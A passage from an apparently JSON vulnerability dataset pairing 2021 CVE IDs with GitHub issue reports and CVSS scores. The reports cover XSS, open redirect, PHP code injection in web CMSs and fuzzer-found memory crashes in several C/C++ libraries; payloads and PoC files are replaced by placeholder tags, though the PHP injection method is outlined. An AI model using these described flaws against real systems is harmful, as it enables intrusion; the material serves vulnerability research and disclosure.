        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-39499",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/18",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/18",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2021-08-21T15:53:36Z",
        "description": "Change email address in user's function lead to XSS. I and MENTIONTAG found a XSS vulnerability on a user function called APITAG when we audit your source code. The vulnerability occurs when we input new email with injecting some trick to trigger XSS in title param like: APITAG To trigger this bug, we did following below NUMBERTAG Access url: URLTAG APITAG NUMBERTAG Enter a valid email NUMBERTAG Click to Send ( APITAG in your language) button. And then the XSS is triggered. Solution: To fix this vulnerability, please validate input from user into title param",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39501",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/17",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/17",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2021-08-21T15:19:24Z",
        "description": "There is Open redirect vulnerability in param \"referurl\" of Logout function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Logout function accepts a user controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. FILETAG APITAG Requests: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39503",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/15",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/15",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2021-08-22T08:31:32Z",
        "description": "PHP Code Execution via create new site function in FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Condition: Admin user Version NUMBERTAG Description: In APITAG function of FILETAG file call to APITAG function to append content when i create a new site to FILETAG file, becase of filtered input without \"<, >, ?, =, `,....\" the attacker can append ?> to close php syntax and adding new php function In FILETAG file FILETAG FILETAG APITAG function: FILETAG APITAG FILETAG In FILETAG file FILETAG Then back to .php files in /admin/ directory to execute code FILETAG Request CODETAG Response CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-39514",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/36",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/36",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-04T02:48:57Z",
        "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39515",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/37",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/37",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-04T12:51:56Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39516",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/42",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/42",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-13T04:27:58Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39517",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/33",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/33",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-04T01:54:43Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39518",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/35",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/35",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-04T02:45:44Z",
        "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39519",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/28",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/28",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-01T14:34:03Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39520",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/34",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/34",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2020-08-04T02:30:41Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39521",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/262",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/262",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-08-03T14:19:33Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master bacd NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV bit_read_BB bits NUMBERTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39522",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/255",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/255",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-07-31T12:13:06Z",
        "description": "A heap buffer overflow in bit_wcs2len at APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./heap buffer overflow bit_wcs2len bits NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39523",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/251",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/251",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-07-31T08:53:01Z",
        "description": "A Segmentation fault error in check_POLYLINE_handles at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39525",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/261",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/261",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-08-02T04:51:37Z",
        "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39527",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/252",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/252",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-07-31T08:58:03Z",
        "description": "A heap buffer overflow in appinfo_private at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./heap buffer overflow appinfo_private decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39528",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/256",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/256",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-08-01T12:56:26Z",
        "description": "A double free in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG b NUMBERTAG ed URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./double free dwg_free_MATERIAL_private APITAG NUMBERTAG FILETAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39530",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/258",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/258",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-08-02T02:25:59Z",
        "description": "Incomplete fix for issues NUMBERTAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./heap overflow bit_wcs2nlen bit NUMBERTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39531",
        "Issue_Url_old": "https://github.com/Juniper/libslax/issues/53",
        "Issue_Url_new": "https://github.com/juniper/libslax/issues/53",
        "Repo_new": "juniper/libslax",
        "Issue_Created_At": "2020-08-03T16:29:31Z",
        "description": "A dynamic stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39532",
        "Issue_Url_old": "https://github.com/Juniper/libslax/issues/50",
        "Issue_Url_new": "https://github.com/juniper/libslax/issues/50",
        "Repo_new": "juniper/libslax",
        "Issue_Created_At": "2020-08-02T14:01:43Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39533",
        "Issue_Url_old": "https://github.com/Juniper/libslax/issues/51",
        "Issue_Url_new": "https://github.com/juniper/libslax/issues/51",
        "Repo_new": "juniper/libslax",
        "Issue_Created_At": "2020-08-02T14:04:56Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39534",
        "Issue_Url_old": "https://github.com/Juniper/libslax/issues/52",
        "Issue_Url_new": "https://github.com/juniper/libslax/issues/52",
        "Repo_new": "juniper/libslax",
        "Issue_Created_At": "2020-08-02T14:07:30Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39535",
        "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/398",
        "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/398",
        "Repo_new": "libxsmm/libxsmm",
        "Issue_Created_At": "2020-08-02T12:35:38Z",
        "description": "A Segmentation fault in libxsmm_gemm_generator. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line This input is the project testcases APITAG PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP ./SEGV gemm_generator Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39536",
        "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/402",
        "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/402",
        "Repo_new": "libxsmm/libxsmm",
        "Issue_Created_At": "2020-08-04T03:30:27Z",
        "description": "A heap overflow causes corrupted heap size . System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39538",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/4",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/4",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-06T03:30:47Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39539",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/6",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/6",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-06T04:47:08Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39540",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/2",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/2",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-06T03:21:53Z",
        "description": "A stack overflow in APITAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39541",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/3",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/3",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-06T03:28:10Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39542",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/5",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/5",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-06T03:35:01Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39543",
        "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/1",
        "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/1",
        "Repo_new": "leonhad/pdftools",
        "Issue_Created_At": "2020-08-05T14:10:06Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39544",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/25",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/25",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T04:52:18Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39545",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/31",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/31",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T05:04:52Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39546",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/29",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/29",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T05:00:32Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39547",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/32",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/32",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T05:06:36Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39548",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/28",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/28",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2020-08-14T04:58:45Z",
        "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-39549",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/27",
